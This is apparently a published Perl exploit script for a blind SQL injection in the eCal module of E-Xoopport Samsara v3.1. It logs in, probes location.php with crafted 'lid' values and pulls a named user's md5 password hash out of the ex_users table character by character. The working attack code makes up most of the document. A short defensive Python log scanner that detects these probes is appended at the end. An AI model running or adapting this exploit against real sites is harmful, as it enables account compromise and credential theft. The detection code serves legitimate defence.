#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew
# Web Site: www.warwolfz.org

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "
 E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
\r\n";

if (@ARGV != 4) {
    print "\r\nUsage: perl exploit_name.pl <VictimHost> <YourNick> <YourPass> <NickToHack>\r\n";
    exit;
}

my $host    = $ARGV[0];
my $usr     = $ARGV[1];
my $pwd     = $ARGV[2];
my $anickde = $ARGV[3];
# Target username is sent as a MySQL hex literal (0x...) so no quotes are needed in the query.
my $anick   = '0x' . EncHex($anickde);

print "[!] Logging In...\r\n";

my %postdata = (
    uname => "$usr",
    pass  => "$pwd",
    op    => "login"
);

my $cookies = HTTP::Cookies->new( autosave => 1 );
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$ua->cookie_jar($cookies);

my $req     = (POST $host . "/user.php", \%postdata);
my $request = $ua->request($req);
my $content = $request->content;

# The portal is Italian: "Benvenuto su" ("Welcome to") marks a successful login.
if ($content =~ /<h4>Benvenuto su/i) {
    print "[+] Logged in!\r\n";
} else {
    print "[-] Fatal Error: username/password incorrect?\r\n";
    exit;
}

print "[!] Checking permissions...\r\n";

$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$req = $host . "/modules/eCal/location.php?lid=1+AND+1=1";
$ua->cookie_jar($cookies);
$request = $ua->get($req);
$content = $request->content;

# "Eventi nella località" ("Events in the location") only appears when the
# logged-in account may view the eCal module and the injected condition is true.
if ($content !~ /<b>Eventi nella località: <\/b>/ig) {
    print "[+] Fatal Error: Access denied\r\n";
    exit;
} else {
    print "[+] You have permissions\r\n";
}

print "[!] Exploiting...\r\n";

# Boolean-based blind extraction: one request per candidate byte for each of
# the 32 hex characters of the stored md5 hash.
my $i = 1;
my $pwdchr;
while ($i != 33) {
    my $wn = 47;
    while (1) {
        $wn++;
        my $ua = LWP::UserAgent->new;
        $ua->agent("Mozilla 5.0");
        my $req = $host . "/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
        $ua->cookie_jar($cookies);
        my $request = $ua->get($req);
        my $content = $request->content;

        # Debug dump of the last response.
        open LOGZZ, '>lol.html';
        print LOGZZ $content;
        close LOGZZ;

        # The event list links to localleve.php only when the condition is true.
        if ($content !~ /<b>Eventi nella località: <\/b><a href='localleve\.php\?lid='>/ig) {
            $pwdchr .= chr($wn);
            $^O eq 'MSWin32' ? system('cls') : system('clear');
            PrintChars($anickde, $pwdchr);
            last;
        }
    }
    $i++;
}

print "\r\n[!] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.org\r\n\r\n";

sub PrintChars {
    my $anick1 = $_[0];
    my $chars  = $_[1];
    print "
 E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+

[!] Logging In...
[+] Logged in!
[!] Checking permissions...
[+] You have permissions
[!] Exploiting...
[+] " . $anick1 . "'s md5 Password: " . $chars . "
";
}

# Hex-encode a string for use as a MySQL 0x... literal.
sub EncHex {
    my $char = $_[0];
    chomp $char;
    my @trans = unpack("H*", "$char");
    return $trans[0];
}

#[Unit-X] Vuln-X DB 2010.09.21
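As an added defensive example (not part of the original exploit or of E-Xoopport), the following Python flags the probe pattern this script sends, a numeric `lid` followed by `AND 1=1` or `AND ascii(substring(...))`, in web-server access logs and counts probes per client; the log lines, addresses and threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache combined-log sample (not a real capture).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2010:10:00:01 +0200] "GET /modules/eCal/location.php?lid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Sep/2010:10:00:02 +0200] "GET /modules/eCal/location.php?lid=1+AND+1=1 HTTP/1.1" 200 5120 "-" "Mozilla 5.0"
203.0.113.7 - - [12/Sep/2010:10:00:03 +0200] "GET /modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=0x61646d696e+LIMIT+0,1),1,1))=48 HTTP/1.1" 200 4096 "-" "Mozilla 5.0"
203.0.113.7 - - [12/Sep/2010:10:00:03 +0200] "GET /modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=0x61646d696e+LIMIT+0,1),1,1))=49 HTTP/1.1" 200 4096 "-" "Mozilla 5.0"
198.51.100.9 - - [12/Sep/2010:10:00:05 +0200] "GET /modules/eCal/location.php?lid=2 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Boolean-blind probe: a numeric comparison or ascii(substring( appended with AND,
# the two shapes the exploit above uses.
BLIND_RE = re.compile(r'\bAND\b\s*(?:\d+\s*=\s*\d+|ascii\s*\(\s*substring\s*\()', re.I)


def classify_request(target):
    """Return (lid_value, is_probe) for an eCal location.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/modules/eCal/location.php'):
        return None
    lid = parse_qs(parts.query).get('lid', [''])[0]
    # parse_qs already decodes '+' and %xx; decode once more to catch
    # double-encoded probes.
    lid = unquote_plus(lid)
    # lid is an integer id in normal use; anything else is treated as a probe.
    return lid, bool(BLIND_RE.search(lid)) or not lid.isdigit()


def scan_log(text, threshold=3):
    """Count blind-SQLi probes per client IP and report those at/over threshold."""
    probes = defaultdict(int)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify_request(m.group('target'))
        if result and result[1]:
            probes[m.group('ip')] += 1
    return {ip: n for ip, n in probes.items() if n >= threshold}


if __name__ == '__main__':
    print(scan_log(SAMPLE_LOG))
```

A real extraction run issues up to 32 positions times dozens of candidate bytes from one session, so a low per-client threshold over a short window separates it cleanly from ordinary calendar browsing.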